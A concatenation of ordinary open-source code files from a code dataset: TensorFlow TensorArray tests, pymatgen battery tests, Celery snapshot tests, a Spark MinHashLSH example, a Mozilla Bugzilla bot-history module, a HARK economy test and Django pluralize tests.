with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
g_h = h.grad()
w0 = h.write(0, [[4.0, 5.0]])
w1 = w0.write(1, [[1.0]])
w2 = w1.write(2, -3.0)
g_w0 = g_h.write(0, [[5.0, 6.0]])
g_w1 = g_w0.write(1, [[2.0]])
g_w2 = g_w1.write(2, -2.0)
r0 = w2.read(0)
r1 = w2.read(1)
r2 = w2.read(2)
g_r0 = g_w2.read(0)
g_r1 = g_w2.read(1)
g_r2 = g_w2.read(2)
d0, d1, d2, g_d0, g_d1, g_d2 = sess.run([r0, r1, r2, g_r0, g_r1, g_r2])
self.assertAllEqual([[4.0, 5.0]], d0)
self.assertAllEqual([[1.0]], d1)
self.assertAllEqual(-3.0, d2)
self.assertAllEqual([[5.0, 6.0]], g_d0)
self.assertAllEqual([[2.0]], g_d1)
self.assertAllEqual(-2.0, g_d2)
def testTensorGradArrayWriteRead(self):
self._testTensorGradArrayWriteRead(use_gpu=False)
self._testTensorGradArrayWriteRead(use_gpu=True)
def _testTensorGradAccessTwiceReceiveSameObject(self, use_gpu):
with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
g_h_0 = h.grad()
g_h_1 = h.grad()
with tf.control_dependencies([g_h_0.write(0, [[4.0, 5.0]]).flow]):
# Write with one gradient handle, read with another copy of it
r1_0 = g_h_1.read(0)
t_g_h_0, t_g_h_1, d_r1_0 = sess.run([g_h_0.handle, g_h_1.handle, r1_0])
self.assertAllEqual(t_g_h_0, t_g_h_1)
self.assertAllEqual([[4.0, 5.0]], d_r1_0)
def testTensorGradAccessTwiceReceiveSameObject(self):
self._testTensorGradAccessTwiceReceiveSameObject(False)
self._testTensorGradAccessTwiceReceiveSameObject(True)
def _testTensorArrayWriteWrongIndexOrDataTypeFails(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
# Test writing the wrong datatype
with self.assertRaisesOpError(
"TensorArray dtype is float but Op is trying to write dtype string"):
h.write(-1, "wrong_type_scalar").flow.eval()
# Test writing to a negative index
with self.assertRaisesOpError(
"Tried to write to index -1 but array size is: 3"):
h.write(-1, 3.0).flow.eval()
# Test reading from too large an index
with self.assertRaisesOpError(
"Tried to write to index 3 but array size is: 3"):
h.write(3, 3.0).flow.eval()
def testTensorArrayWriteWrongIndexOrDataTypeFails(self):
self._testTensorArrayWriteWrongIndexOrDataTypeFails(use_gpu=False)
self._testTensorArrayWriteWrongIndexOrDataTypeFails(use_gpu=True)
def _testTensorArrayReadWrongIndexOrDataTypeFails(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
w0 = h.write(0, [[4.0, 5.0]])
# Test reading wrong datatype
r0_bad = gen_data_flow_ops._tensor_array_read(
handle=w0.handle, index=0, dtype=tf.int64, flow_in=w0.flow)
with self.assertRaisesOpError(
"TensorArray dtype is float but Op requested dtype int64."):
r0_bad.eval()
# Test reading from a different index than the one we wrote to
r1 = w0.read(1)
with self.assertRaisesOpError(
"Could not read from TensorArray index 1 because "
"it has not yet been written to."):
r1.eval()
# Test reading from a negative index
with self.assertRaisesOpError(
r"Tried to read from index -1 but array size is: 3"):
h.read(-1).eval()
# Test reading from too large an index
with self.assertRaisesOpError(
"Tried to read from index 3 but array size is: 3"):
h.read(3).eval()
def testTensorArrayReadWrongIndexOrDataTypeFails(self):
self._testTensorArrayReadWrongIndexOrDataTypeFails(use_gpu=False)
self._testTensorArrayReadWrongIndexOrDataTypeFails(use_gpu=True)
def _testTensorArrayWriteMultipleFails(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
with self.assertRaisesOpError(
"Could not write to TensorArray index 2 because "
"it has already been written to."):
h.write(2, 3.0).write(2, 3.0).flow.eval()
def testTensorArrayWriteMultipleFails(self):
self._testTensorArrayWriteMultipleFails(use_gpu=False)
self._testTensorArrayWriteMultipleFails(use_gpu=True)
def _testTensorArrayWriteGradientAddMultipleAddsType(self, use_gpu, dtype):
with self.test_session(use_gpu=use_gpu):
h = data_flow_ops.TensorArray(
dtype=dtype, tensor_array_name="foo", size=3)
h._gradient_add = True
c = lambda x: np.asarray(x, dtype=dtype.as_numpy_dtype)
w0 = h.write(2, c(3.0))
w1 = w0.write(2, c(4.0))
self.assertAllEqual(c(7.00), w1.read(2).eval())
def _testTensorArrayWriteGradientAddMultipleAdds(self, use_gpu):
for dtype in [tf.int32, tf.int64, tf.float32, tf.float64, tf.complex64]:
self._testTensorArrayWriteGradientAddMultipleAddsType(use_gpu, dtype)
def testTensorArrayWriteGradientAddMultipleAdds(self):
self._testTensorArrayWriteGradientAddMultipleAdds(use_gpu=False)
self._testTensorArrayWriteGradientAddMultipleAdds(use_gpu=True)
def _testMultiTensorArray(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
h1 = data_flow_ops.TensorArray(
size=1, dtype=tf.float32, tensor_array_name="foo")
w1 = h1.write(0, 4.0)
r1 = w1.read(0)
h2 = data_flow_ops.TensorArray(
size=1, dtype=tf.float32, tensor_array_name="bar")
w2 = h2.write(0, 5.0)
r2 = w2.read(0)
r = r1 + r2
self.assertAllClose(9.0, r.eval())
def testMultiTensorArray(self):
self._testMultiTensorArray(use_gpu=False)
self._testMultiTensorArray(use_gpu=True)
def _testDuplicateTensorArrayFails(self, use_gpu):
with self.test_session(use_gpu=use_gpu) as sess:
h1 = data_flow_ops.TensorArray(
size=1, dtype=tf.float32, tensor_array_name="foo")
c1 = h1.write(0, 4.0)
h2 = data_flow_ops.TensorArray(
size=1, dtype=tf.float32, tensor_array_name="foo")
c2 = h2.write(0, 5.0)
with self.assertRaises(errors.AlreadyExistsError):
sess.run([c1.flow, c2.flow])
def testDuplicateTensorArrayFails(self):
self._testDuplicateTensorArrayFails(use_gpu=False)
self._testDuplicateTensorArrayFails(use_gpu=True)
def _testTensorArrayGradientWriteReadType(self, use_gpu, dtype):
with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf.as_dtype(dtype), tensor_array_name="foo", size=3)
c = lambda x: np.array(x, dtype=dtype)
value_0 = tf.constant(c([[4.0, 5.0]]))
value_1 = tf.constant(c(3.0))
w0 = h.write(0, value_0)
w1 = w0.write(1, value_1)
r0 = w1.read(0)
r1 = w1.read(1)
r0_2 = w1.read(0)
# Test individual components' gradients
grad_just_r0 = tf.gradients(
ys=[r0], xs=[value_0], grad_ys=[c([[2.0, 3.0]])])
grad_just_r0_vals = sess.run(grad_just_r0)
self.assertAllEqual(c([[2.0, 3.0]]), grad_just_r0_vals[0])
grad_r0_r0_2 = tf.gradients(
ys=[r0, r0_2], xs=[value_0],
grad_ys=[c([[2.0, 3.0]]), c([[1.0, -1.0]])])
grad_r0_r0_2_vals = sess.run(grad_r0_r0_2)
self.assertAllEqual(c([[3.0, 2.0]]), grad_r0_r0_2_vals[0])
grad_just_r1 = tf.gradients(
ys=[r1], xs=[value_1], grad_ys=[c(-2.0)])
grad_just_r1_vals = sess.run(grad_just_r1)
self.assertAllEqual(c(-2.0), grad_just_r1_vals[0])
# Test combined gradients
grad = tf.gradients(
ys=[r0, r0_2, r1], xs=[value_0, value_1],
grad_ys=[c(-1.0), c(-2.0), c([[2.0, 3.0]])])
grad_vals = sess.run(grad)
self.assertEqual(len(grad_vals), 2)
self.assertAllClose(c(-3.0), grad_vals[0])
self.assertAllEqual(c([[2.0, 3.0]]), grad_vals[1])
def _testTensorArrayGradientWriteRead(self, use_gpu):
for dtype in (np.float32, np.float64, np.int32, np.int64, np.complex64):
self._testTensorArrayGradientWriteReadType(use_gpu, dtype)
def testTensorArrayGradientWriteRead(self):
self._testTensorArrayGradientWriteRead(False)
self._testTensorArrayGradientWriteRead(True)
def _testTensorArrayGradientWritePackAndRead(self, use_gpu):
with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=2)
value_0 = tf.constant([-1.0, 1.0])
value_1 = tf.constant([-10.0, 10.0])
w0 = h.write(0, value_0)
w1 = w0.write(1, value_1)
p0 = w1.pack()
r0 = w1.read(0)
# Test gradient accumulation between read(0) and pack()
grad_r = tf.gradients(
ys=[p0, r0], xs=[value_0, value_1],
grad_ys=[
[[2.0, 3.0], [4.0, 5.0]],
[-0.5, 1.5]])
grad_vals = sess.run(grad_r) # 2 + 2 entries
self.assertAllClose([2.0 - 0.5, 3.0 + 1.5], grad_vals[0])
self.assertAllEqual([4.0, 5.0], grad_vals[1])
def testTensorArrayGradientWritePackAndRead(self):
self._testTensorArrayGradientWritePackAndRead(False)
self._testTensorArrayGradientWritePackAndRead(True)
def _testTensorArrayGradientUnpackRead(self, use_gpu):
with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=2)
value = tf.constant([[1.0, -1.0], [10.0, -10.0]])
w = h.unpack(value)
r0 = w.read(0)
r0_1 = w.read(0)
r1 = w.read(1)
# Test combined gradients + aggregation of read(0)
grad = tf.gradients(
ys=[r0, r0_1, r1], xs=[value], grad_ys=
[[2.0, 3.0], [-1.5, 1.5], [4.0, 5.0]])
grad_vals = sess.run(grad)
self.assertEqual(len(grad_vals), 1)
self.assertAllClose([[2.0 - 1.5, 3.0 + 1.5], [4.0, 5.0]], grad_vals[0])
def testTensorArrayGradientUnpackRead(self):
self._testTensorArrayGradientUnpackRead(False)
self._testTensorArrayGradientUnpackRead(True)
def _testCloseTensorArray(self, use_gpu):
with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
c1 = h.close()
sess.run(c1)
def testCloseTensorArray(self):
self._testCloseTensorArray(use_gpu=False)
self._testCloseTensorArray(use_gpu=True)
def _testWriteCloseTensorArray(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
w0 = h.write(0, [[4.0, 5.0]])
w1 = w0.write(1, [3.0])
w1.close().run() # Expected to run without problems
with self.assertRaisesOpError(r"Tensor foo has already been closed."):
with tf.control_dependencies([w1.close()]):
w1.write(2, 3.0).flow.eval()
def testWriteCloseTensorArray(self):
self._testWriteCloseTensorArray(use_gpu=False)
self._testWriteCloseTensorArray(use_gpu=True)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 |
Bismarrck/pymatgen | pymatgen/apps/battery/tests/test_insertion_battery.py | 9 | 4792 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import unicode_literals
"""
Created on Jan 25, 2012
"""
__author__ = "Anubhav Jain, Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Anubhav Jain"
__email__ = "ajain@lbl.gov"
__date__ = "Jan 25, 2012"
import unittest
import os
import json
from pymatgen.entries.computed_entries import ComputedEntry
from pymatgen.apps.battery.insertion_battery import InsertionElectrode
from pymatgen import MontyEncoder, MontyDecoder
test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..", "..",
'test_files')
class InsertionElectrodeTest(unittest.TestCase):
def setUp(self):
self.entry_Li = ComputedEntry("Li", -1.90753119)
with open(os.path.join(test_dir, "LiTiO2_batt.json"), "r") as f:
self.entries_LTO = json.load(f, cls=MontyDecoder)
with open(os.path.join(test_dir, "MgVO_batt.json"), "r") as file:
self.entries_MVO = json.load(file, cls=MontyDecoder)
with open(os.path.join(test_dir, "Mg_batt.json"), "r") as file:
self.entry_Mg = json.load(file, cls=MontyDecoder)
self.ie_LTO = InsertionElectrode(self.entries_LTO, self.entry_Li)
self.ie_MVO = InsertionElectrode(self.entries_MVO, self.entry_Mg)
def test_voltage(self):
#test basic voltage
self.assertAlmostEqual(self.ie_LTO.max_voltage, 2.78583901, 3)
self.assertAlmostEqual(self.ie_LTO.min_voltage, 0.89702381, 3)
self.assertAlmostEqual(self.ie_LTO.get_average_voltage(), 1.84143141,
3)
#test voltage range selectors
self.assertAlmostEqual(self.ie_LTO.get_average_voltage(0, 1),
0.89702381, 3)
self.assertAlmostEqual(self.ie_LTO.get_average_voltage(2, 3),
2.78583901, 3)
#test non-existing voltage range
self.assertAlmostEqual(self.ie_LTO.get_average_voltage(0, 0.1), 0, 3)
self.assertAlmostEqual(self.ie_LTO.get_average_voltage(4, 5), 0, 3)
self.assertAlmostEqual(self.ie_MVO.get_average_voltage(), 2.513767,3)
def test_capacities(self):
#test basic capacity
self.assertAlmostEqual(self.ie_LTO.get_capacity_grav(), 308.74865045,
3)
self.assertAlmostEqual(self.ie_LTO.get_capacity_vol(), 1205.99391136,
3)
#test capacity selector
self.assertAlmostEqual(self.ie_LTO.get_capacity_grav(1, 3),
154.374325225, 3)
#test alternate normalization option
self.assertAlmostEqual(self.ie_LTO.get_capacity_grav(1, 3, False),
160.803169506, 3)
self.assertIsNotNone(self.ie_LTO.as_dict_summary(True))
self.assertAlmostEqual(self.ie_MVO.get_capacity_grav(), 281.845548242, 3)
self.assertAlmostEqual(self.ie_MVO.get_capacity_vol(), 1145.80087994, 3)
def test_get_muO2(self):
self.assertIsNone(self.ie_LTO.get_max_muO2())
def test_entries(self):
#test that the proper number of sub-electrodes are returned
self.assertEqual(len(self.ie_LTO.get_sub_electrodes(False, True)), 3)
self.assertEqual(len(self.ie_LTO.get_sub_electrodes(True, True)), 2)
def test_get_all_entries(self):
self.ie_LTO.get_all_entries()
def test_to_from_dict(self):
d = self.ie_LTO.as_dict()
ie = InsertionElectrode.from_dict(d)
self.assertAlmostEqual(ie.max_voltage, 2.78583901, 3)
self.assertAlmostEqual(ie.min_voltage, 0.89702381, 3)
self.assertAlmostEqual(ie.get_average_voltage(), 1.84143141, 3)
#Just to make sure json string works.
json_str = json.dumps(self.ie_LTO, cls=MontyEncoder)
ie = json.loads(json_str, cls=MontyDecoder)
self.assertAlmostEqual(ie.max_voltage, 2.78583901, 3)
self.assertAlmostEqual(ie.min_voltage, 0.89702381, 3)
self.assertAlmostEqual(ie.get_average_voltage(), 1.84143141, 3)
def test_voltage_pair(self):
vpair = self.ie_LTO[0]
self.assertAlmostEqual(vpair.voltage, 2.78583901)
self.assertAlmostEqual(vpair.mAh, 13400.7411749, 2)
self.assertAlmostEqual(vpair.mass_charge, 79.8658)
self.assertAlmostEqual(vpair.mass_discharge, 83.3363)
self.assertAlmostEqual(vpair.vol_charge, 37.553684467)
self.assertAlmostEqual(vpair.vol_discharge, 37.917719932)
self.assertAlmostEqual(vpair.frac_charge, 0.0)
self.assertAlmostEqual(vpair.frac_discharge, 0.14285714285714285)
if __name__ == '__main__':
unittest.main()
| mit |
vipul-sharma20/oh-mainline | vendor/packages/celery/celery/tests/test_events/test_events_snapshot.py | 18 | 3412 | from __future__ import absolute_import
from __future__ import with_statement
from celery.app import app_or_default
from celery.events import Events
from celery.events.snapshot import Polaroid, evcam
from celery.tests.utils import unittest
class TRef(object):
active = True
called = False
def __call__(self):
self.called = True
def cancel(self):
self.active = False
class MockTimer(object):
installed = []
def apply_interval(self, msecs, fun, *args, **kwargs):
self.installed.append(fun)
return TRef()
timer = MockTimer()
class test_Polaroid(unittest.TestCase):
def setUp(self):
self.app = app_or_default()
self.state = self.app.events.State()
def test_constructor(self):
x = Polaroid(self.state, app=self.app)
self.assertIs(x.app, self.app)
self.assertIs(x.state, self.state)
self.assertTrue(x.freq)
self.assertTrue(x.cleanup_freq)
self.assertTrue(x.logger)
self.assertFalse(x.maxrate)
def test_install_timers(self):
x = Polaroid(self.state, app=self.app)
x.timer = timer
x.__exit__()
x.__enter__()
self.assertIn(x.capture, MockTimer.installed)
self.assertIn(x.cleanup, MockTimer.installed)
self.assertTrue(x._tref.active)
self.assertTrue(x._ctref.active)
x.__exit__()
self.assertFalse(x._tref.active)
self.assertFalse(x._ctref.active)
self.assertTrue(x._tref.called)
self.assertFalse(x._ctref.called)
def test_cleanup(self):
x = Polaroid(self.state, app=self.app)
cleanup_signal_sent = [False]
def handler(**kwargs):
cleanup_signal_sent[0] = True
x.cleanup_signal.connect(handler)
x.cleanup()
self.assertTrue(cleanup_signal_sent[0])
def test_shutter__capture(self):
x = Polaroid(self.state, app=self.app)
shutter_signal_sent = [False]
def handler(**kwargs):
shutter_signal_sent[0] = True
x.shutter_signal.connect(handler)
x.shutter()
self.assertTrue(shutter_signal_sent[0])
shutter_signal_sent[0] = False
x.capture()
self.assertTrue(shutter_signal_sent[0])
def test_shutter_maxrate(self):
x = Polaroid(self.state, app=self.app, maxrate="1/h")
shutter_signal_sent = [0]
def handler(**kwargs):
shutter_signal_sent[0] += 1
x.shutter_signal.connect(handler)
for i in range(30):
x.shutter()
x.shutter()
x.shutter()
self.assertEqual(shutter_signal_sent[0], 1)
class test_evcam(unittest.TestCase):
class MockReceiver(object):
raise_keyboard_interrupt = False
def capture(self, **kwargs):
if self.__class__.raise_keyboard_interrupt:
raise KeyboardInterrupt()
class MockEvents(Events):
def Receiver(self, *args, **kwargs):
return test_evcam.MockReceiver()
def setUp(self):
self.app = app_or_default()
self.app.events = self.MockEvents()
def test_evcam(self):
evcam(Polaroid, timer=timer)
evcam(Polaroid, timer=timer, loglevel="CRITICAL")
self.MockReceiver.raise_keyboard_interrupt = True
with self.assertRaises(SystemExit):
evcam(Polaroid, timer=timer)
| agpl-3.0 |
esi-mineset/spark | examples/src/main/python/ml/min_hash_lsh_example.py | 52 | 3222 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
An example demonstrating MinHashLSH.
Run with:
bin/spark-submit examples/src/main/python/ml/min_hash_lsh_example.py
"""
from __future__ import print_function
# $example on$
from pyspark.ml.feature import MinHashLSH
from pyspark.ml.linalg import Vectors
from pyspark.sql.functions import col
# $example off$
from pyspark.sql import SparkSession
if __name__ == "__main__":
spark = SparkSession \
.builder \
.appName("MinHashLSHExample") \
.getOrCreate()
# $example on$
dataA = [(0, Vectors.sparse(6, [0, 1, 2], [1.0, 1.0, 1.0]),),
(1, Vectors.sparse(6, [2, 3, 4], [1.0, 1.0, 1.0]),),
(2, Vectors.sparse(6, [0, 2, 4], [1.0, 1.0, 1.0]),)]
dfA = spark.createDataFrame(dataA, ["id", "features"])
dataB = [(3, Vectors.sparse(6, [1, 3, 5], [1.0, 1.0, 1.0]),),
(4, Vectors.sparse(6, [2, 3, 5], [1.0, 1.0, 1.0]),),
(5, Vectors.sparse(6, [1, 2, 4], [1.0, 1.0, 1.0]),)]
dfB = spark.createDataFrame(dataB, ["id", "features"])
key = Vectors.sparse(6, [1, 3], [1.0, 1.0])
mh = MinHashLSH(inputCol="features", outputCol="hashes", numHashTables=5)
model = mh.fit(dfA)
# Feature Transformation
print("The hashed dataset where hashed values are stored in the column 'hashes':")
model.transform(dfA).show()
# Compute the locality sensitive hashes for the input rows, then perform approximate
# similarity join.
# We could avoid computing hashes by passing in the already-transformed dataset, e.g.
# `model.approxSimilarityJoin(transformedA, transformedB, 0.6)`
print("Approximately joining dfA and dfB on distance smaller than 0.6:")
model.approxSimilarityJoin(dfA, dfB, 0.6, distCol="JaccardDistance")\
.select(col("datasetA.id").alias("idA"),
col("datasetB.id").alias("idB"),
col("JaccardDistance")).show()
# Compute the locality sensitive hashes for the input rows, then perform approximate nearest
# neighbor search.
# We could avoid computing hashes by passing in the already-transformed dataset, e.g.
# `model.approxNearestNeighbors(transformedA, key, 2)`
# It may return less than 2 rows when not enough approximate near-neighbor candidates are
# found.
print("Approximately searching dfA for 2 nearest neighbors of the key:")
model.approxNearestNeighbors(dfA, key, 2).show()
# $example off$
spark.stop()
| apache-2.0 |
mozilla/bztools | auto_nag/history.py | 1 | 16781 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from pprint import pprint
from libmozdata.bugzilla import Bugzilla
from auto_nag import logger
class History(object):
BOT = "release-mgmt-account-bot@mozilla.tld"
def __init__(self):
super(History, self).__init__()
def get_bugs(self):
logger.info("History: get bugs: start...")
def bug_handler(bug, data):
data.add(bug["id"])
fields = {
"changedby": [
"keywords",
"product",
"component",
"assigned_to",
"cf_crash_signature",
"everconfirmed",
"cf_has_regression_range",
"cf_has_str",
"priority",
"bug_severity",
"resolution",
"bug_status",
"bug_type",
"cf_status_firefox68",
"cf_status_firefox67",
"cf_status_firefox66",
"cf_status_firefox65",
"cf_status_firefox64",
"cf_status_firefox63",
"cf_status_firefox62",
],
"equals": ["commenter", "setters.login_name"],
}
queries = []
bugids = set()
for op, fs in fields.items():
for f in fs:
params = {"include_fields": "id", "f1": f, "o1": op, "v1": History.BOT}
queries.append(
Bugzilla(params, bughandler=bug_handler, bugdata=bugids, timeout=20)
)
for q in queries:
q.get_data().wait()
logger.info("History: get bugs: end.")
return bugids
def get_bug_info(self, bugids):
logger.info("History: get bugs info: start...")
def history_handler(bug, data):
bugid = str(bug["id"])
for h in bug["history"]:
if h["who"] == History.BOT:
del h["who"]
data[bugid].append(h)
def comment_handler(bug, bugid, data):
bugid = str(bugid)
for comment in bug["comments"]:
if comment["author"] == History.BOT:
text = comment["text"]
data[bugid].append(
{"comment": text, "date": comment["creation_time"]}
)
data = {str(bugid): [] for bugid in bugids}
Bugzilla(
list(data.keys()),
historyhandler=history_handler,
historydata=data,
commenthandler=comment_handler,
commentdata=data,
timeout=960,
).get_data().wait()
logger.info("History: get bugs info: end.")
return data
def cleanup(self, data):
# res is a dictionary: change_date_time => change or comment
res = {}
for bugid, info in data.items():
res[bugid] = x = {}
for c in info:
if "changes" in c:
when = c["when"]
del c["when"]
if when not in x:
x[when] = {"changes": c["changes"]}
else:
x[when]["changes"] += c["changes"]
if "comment" in c:
when = c["date"]
del c["date"]
if when not in x:
x[when] = {"comment": c["comment"]}
else:
x[when]["comment"] = c["comment"]
return res
def get_pc(self, changes):
p = ""
c = ""
for change in changes:
if change.get("field_name") == "component" and "added" in change:
c = change["added"]
if change.get("field_name") == "product" and "added" in change:
p = change["added"]
return "{}::{}".format(p, c)
def get_ni(self, changes):
for change in changes:
if change.get("field_name") == "flagtypes.name" and "added" in change:
c = change["added"]
ni = "needinfo?("
if c.startswith(ni):
return c[len(ni) : -1]
return ""
def guess_tool(self, data):
res = []
no_tool = []
for bugid, info in data.items():
for date, i in info.items():
if "comment" in i:
c = i["comment"]
if c.startswith("Crash volume for signature"):
continue
tool = None
if c.startswith(
"The leave-open keyword is there and there is no activity for"
):
tool = "leave_open_no_activity"
elif c.startswith("Closing because no crashes reported for"):
tool = "no_crashes"
elif c.startswith("Moving to p3 because no activity for at least"):
tool = "old_p2_bug"
elif c.startswith("Moving to p2 because no activity for at least"):
tool = "old_p1_bug"
elif c.startswith(
"There's a r+ patch which didn't land and no activity in this bug"
) or c.startswith(
"There are some r+ patches which didn't land and no activity in this bug for"
):
tool = "not_landed"
elif c.startswith(
"The meta keyword is there, the bug doesn't depend on other bugs and there is no activity for"
):
tool = "meta_no_deps_no_activity"
elif (
"[mozregression](https://wiki.mozilla.org/Auto-tools/Projects/Mozregression)"
in c
):
tool = "has_str_no_range"
elif (
"as the bug is tracked by a release manager for the current nightly"
in c
):
tool = "mismatch_priority_tracking_nightly"
elif (
"as the bug is tracked by a release manager for the current beta"
in c
):
tool = "mismatch_priority_tracking_beta"
elif (
"as the bug is tracked by a release manager for the current release"
in c
):
tool = "mismatch_priority_tracking_release"
elif c.startswith("The priority flag is not set for this bug.\n:"):
tool = "no_priority"
elif c.startswith(
"The priority flag is not set for this bug and there is no activity for"
):
tool = "ni_triage_owner"
if tool is None:
no_tool.append((bugid, info))
else:
extra = self.get_ni(i.get("changes", []))
res.append(
{"tool": tool, "date": date, "bugid": bugid, "extra": extra}
)
else:
changes = i["changes"]
N = len(res)
for change in changes:
if change.get("added") == "meta":
res.append(
{
"tool": "summary_meta_missing",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
elif change.get("field_name") in {"component", "product"}:
res.append(
{
"tool": "component",
"date": date,
"bugid": bugid,
"extra": self.get_pc(changes),
}
)
break
elif change.get("field_name") == "cf_has_str":
res.append(
{
"tool": "has_str_no_hasstr",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
elif change.get("removed") == "leave-open":
res.append(
{
"tool": "leave_open",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
elif change.get("field_name") == "assigned_to":
res.append(
{
"tool": "no_assignee",
"date": date,
"bugid": bugid,
"extra": change["added"],
}
)
break
elif (
change.get("field_name", "").startswith("cf_status_firefox")
and change.get("added") == "affected"
):
res.append(
{
"tool": "nighty_reopened",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
elif (
change.get("field_name") == "status"
and change.get("added") == "ASSIGNED"
):
res.append(
{
"tool": "assignee_but_unconfirmed",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
elif (
change.get("field_name") == "keywords"
and change.get("added") == "regression"
):
res.append(
{
"tool": "regression",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
elif (
change.get("field_name") == "severity"
and change.get("added") == "major"
):
res.append(
{
"tool": "tracked_bad_severity",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
elif change.get("field_name") == "cf_crash_signature":
res.append(
{
"tool": "copy_duplicate_info",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
elif (
change.get("field_name") == "keywords"
and change.get("removed") == "stalled"
):
res.append(
{
"tool": "regression",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
elif (
change.get("field_name") == "type"
and change.get("added") == "defect"
):
res.append(
{
"tool": "regression_but_type_enhancement_task",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
elif (
change.get("field_name") == "keywords"
and change.get("removed") == "dupeme"
):
res.append(
{
"tool": "closed_dupeme",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
elif (
change.get("field_name") == "keywords"
and change.get("added") == "dupeme"
):
res.append(
{
"tool": "dupeme_whiteboard_keyword",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
elif change.get("field_name") == "summary" and change.get(
"added"
).startswith("[meta]"):
res.append(
{
"tool": "meta_summary_missing",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
elif change.get("field_name", "").startswith(
"cf_status_firefox"
) and change.get("added") in {
"?",
"fixed",
"verified",
"unaffected",
}:
res.append(
{
"tool": "missing_beta_status",
"date": date,
"bugid": bugid,
"extra": "",
}
)
break
if len(res) == N:
no_tool.append((bugid, info))
if no_tool:
pprint(no_tool)
return res
def get(self):
bugids = self.get_bugs()
bugs = self.get_bug_info(bugids)
bugs = self.cleanup(bugs)
history = self.guess_tool(bugs)
return history
| bsd-3-clause |
econ-ark/HARK | HARK/ConsumptionSaving/tests/test_SmallOpenEconomy.py | 1 | 1397 | import copy
from HARK import distribute_params
from HARK.ConsumptionSaving.ConsAggShockModel import (
AggShockConsumerType,
SmallOpenEconomy,
init_cobb_douglas,
)
from HARK.distribution import Uniform
import numpy as np
import unittest
class testSmallOpenEconomy(unittest.TestCase):
def test_small_open(self):
agent = AggShockConsumerType()
agent.AgentCount = 100 # Very low number of agents for the sake of speed
agent.cycles = 0
# Make agents heterogeneous in their discount factor
agents = distribute_params(
agent, "DiscFac", 3, Uniform(bot=0.90, top=0.94) # Impatient agents
)
# Make an economy with those agents living in it
small_economy = SmallOpenEconomy(
agents=agents,
Rfree=1.03,
wRte=1.0,
KtoLnow=1.0,
**copy.copy(init_cobb_douglas)
)
small_economy.act_T = 400 # Short simulation history
small_economy.max_loops = 3 # Give up quickly for the sake of time
small_economy.make_AggShkHist() # Simulate a history of aggregate shocks
small_economy.verbose = False # Turn off printed messages
# Give data about the economy to all the agents in it
for this_type in small_economy.agents:
this_type.get_economy_data(small_economy)
small_economy.solve()
| apache-2.0 |
sephii/django | tests/template_tests/filter_tests/test_pluralize.py | 430 | 1200 | from decimal import Decimal
from django.template.defaultfilters import pluralize
from django.test import SimpleTestCase
class FunctionTests(SimpleTestCase):
def test_integers(self):
self.assertEqual(pluralize(1), '')
self.assertEqual(pluralize(0), 's')
self.assertEqual(pluralize(2), 's')
def test_floats(self):
self.assertEqual(pluralize(0.5), 's')
self.assertEqual(pluralize(1.5), 's')
def test_decimals(self):
self.assertEqual(pluralize(Decimal(1)), '')
self.assertEqual(pluralize(Decimal(0)), 's')
self.assertEqual(pluralize(Decimal(2)), 's')
def test_lists(self):
self.assertEqual(pluralize([1]), '')
self.assertEqual(pluralize([]), 's')
self.assertEqual(pluralize([1, 2, 3]), 's')
def test_suffixes(self):
self.assertEqual(pluralize(1, 'es'), '')
self.assertEqual(pluralize(0, 'es'), 'es')
self.assertEqual(pluralize(2, 'es'), 'es')
self.assertEqual(pluralize(1, 'y,ies'), 'y')
self.assertEqual(pluralize(0, 'y,ies'), 'ies')
self.assertEqual(pluralize(2, 'y,ies'), 'ies')
self.assertEqual(pluralize(0, 'y,ies,error'), '')
| bsd-3-clause |
